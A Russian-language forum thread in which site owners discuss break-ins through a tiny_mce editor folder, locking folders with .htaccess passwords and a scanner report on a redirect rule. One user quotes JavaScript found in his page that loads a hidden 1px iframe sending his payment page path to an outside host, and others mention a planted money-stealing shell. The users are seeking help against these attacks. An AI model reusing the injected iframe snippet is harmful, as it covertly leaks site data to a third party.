Vic212
Участник
- Сообщения
- 11
- Реакции
- 0
Достаточно поставить права и не ломать голову искать по скриптам ссылки на этоу папку.Vic212 написал(а):я как раз ищу в сери как поставить правильно защиту htaccess на js. как по мне, то папка tiny_mce вообще не может удалиться из скрипта. они вроде нигде не конфигурирует. может я и ошибаюсь. но именно через нее идут хаки на сайт.
Vic212
Участник
- Сообщения
- 11
- Реакции
- 0
Путь как не меняй, его можно узнать. Посмотри здесь про админку я писал https://servahoc.ru/threads/dyry-na-sajtax.767/#post-11423
Vic212
Участник
- Сообщения
- 11
- Реакции
- 0
Vic212
Участник
- Сообщения
- 11
- Реакции
- 0
кстати о дырах. скачал программу ai-bolit. сделал скан. он мне выдал:
Критические замечания
Шелл-скрипты не найдены.
Список скрытых файлов: (4)
/public_html/.tmb
/public_html/.htaccess
/public_html/.aurlignore
1/public_html/.aignore
Не найдено директорий c дорвеями
Предупреждения
Опасный код в .htaccess (редирект на внешний сервер, подмена расширений или автовнедрение кода)
В самом файле .htaccess :
и т.д.
где он нашел редирект???
Критические замечания
Шелл-скрипты не найдены.
Список скрытых файлов: (4)
/public_html/.tmb
/public_html/.htaccess
/public_html/.aurlignore
1/public_html/.aignore
Не найдено директорий c дорвеями
Предупреждения
Опасный код в .htaccess (редирект на внешний сервер, подмена расширений или автовнедрение кода)
В самом файле .htaccess :
Код:
DirectoryIndex index.php
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
# Home
RewriteRule ^index.html$ index.php [L]
# Rules
RewriteRule ^rules(/?)+$ index.php?menu=rules [L]
где он нашел редирект???
Последнее редактирование модератором:
Yuriiilin
Участник
- Сообщения
- 24
- Реакции
- 0
Пhttps://servahoc.ru/redirect/?url=http://fruit-farm.org/return_viewer2342233.php?go2 пмогите закрыть дыру пожалуйста по адресу http:/мой.сайт/js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/ я искал в интернете нечего не нашел!
Читай Эту тему тут все описано по этомуYuriiilin написал(а):Пhttps://servahoc.ru/redirect/?url=http://fruit-farm.org/return_viewer2342233.php?go2 пмогите закрыть дыру пожалуйста по адресу http:/мой.сайт/js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/ я искал в интернете нечего не нашел!
Yuriiilin
Участник
- Сообщения
- 24
- Реакции
- 0
Можешь помочь с твоим способом закрытия?=))wh1skas написал(а):Кстати о tiny_mce. Я бы предложил Вам залочить папку от недоброжелателей. Есть шелл с баттн.пхп, который пихают в эту папку и снимают денюшку без вывода в статистику выплат. Там же найдете файл лицензии, который надо удалить. Залочить папку предлагаю при помощи .htaccess
Идем в хранилище: / js / editor / jscripts /
в эту папку заливаете файл .htaccess
Погуглив различные способы защиты при помощи.htaccess, выберите наиболее подходящие для Вас. У меня например требует логин и пароль, которые зашифрованы в корневой папке сайта, к которой ограничен доступ.
Vic212
Участник
- Сообщения
- 11
- Реакции
- 0
Yuriiilin
Участник
- Сообщения
- 24
- Реакции
- 0
Нужно защищать только эту папку или можно сразу js, и можно ли сделать тройную защиту? типо Js(вложить защиту)/editor(вложить защиту)/jscripts(вложить защиту) это будет способствовать большей надёжности?=)))wh1skas написал(а):Кстати о tiny_mce. Я бы предложил Вам залочить папку от недоброжелателей. Есть шелл с баттн.пхп, который пихают в эту папку и снимают денюшку без вывода в статистику выплат. Там же найдете файл лицензии, который надо удалить. Залочить папку предлагаю при помощи .htaccess
Идем в хранилище: / js / editor / jscripts /
в эту папку заливаете файл .htaccess
Погуглив различные способы защиты при помощи.htaccess, выберите наиболее подходящие для Вас. У меня например требует логин и пароль, которые зашифрованы в корневой папке сайта, к которой ограничен доступ.
art199908
Участник
- Сообщения
- 271
- Реакции
- 36
да блин пацан, тебе никто не будет в этом помогать, ищи тут об этом говорили уже, в инете ищи - "защита путем htacces" и тебе все выдаст, по 100 раз одно и тоже говорить никто не будетYuriiilin написал(а):Нужно защищать только эту папку или можно сразу js, и можно ли сделать тройную защиту? типо Js(вложить защиту)/editor(вложить защиту)/jscripts(вложить защиту) это будет способствовать большей надёжности?=)))
Yuriiilin
Участник
- Сообщения
- 24
- Реакции
- 0
art199908
Участник
- Сообщения
- 271
- Реакции
- 36
скидывай, проверимYuriiilin написал(а):Походу я защитил сайт, кто может проверить?=))) защитил так что сам не могу зайти в директорию jscripts вводя правильный логин и пароль!=D
Ferz
Местный
- Сообщения
- 73
- Реакции
- 3
Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:
В файле payments нету ничего связанного с payloads..
Это безопасно?
Также прилагаю скрин.
И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
вот скопировал:
PHP:
function send_data(ifr_url){ var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');
Это безопасно?
Также прилагаю скрин.
И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
Ferz
Местный
- Сообщения
- 73
- Реакции
- 3
Еще хотелось бы узнать, можно ли расмматривать вариант зашифровки php скрипта например этим сервисом
art199908
Участник
- Сообщения
- 271
- Реакции
- 36
Это ксс стиль, у меня есть, найди в инете там естьFerz написал(а):Еще хотелось бы узнать, можно ли расмматривать вариант зашифровки php скрипта например этим сервисом
Ferz
Местный
- Сообщения
- 73
- Реакции
- 3
Ребята помогайте, уж больно не нравится мне вот этот кодFerz написал(а):Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:
В файле payments нету ничего связанного с payloads..PHP:function send_data(ifr_url){ var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');
Это безопасно?
Также прилагаю скрин.
И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php')
присоединяюсь к вопросуrobertoman написал(а):Вообщем я заблочил, пересмотрел все файлы не могу понять почему даже при изменении деректории site.ru на site1.ru не пропадает с мониторинга, каким образом он туда заносится? (или крон проверяет новые фермы через определённое время?) И смогли ли вы удалить свою ферму с этого сайта? видел многих проектов там нет, а многие и есть.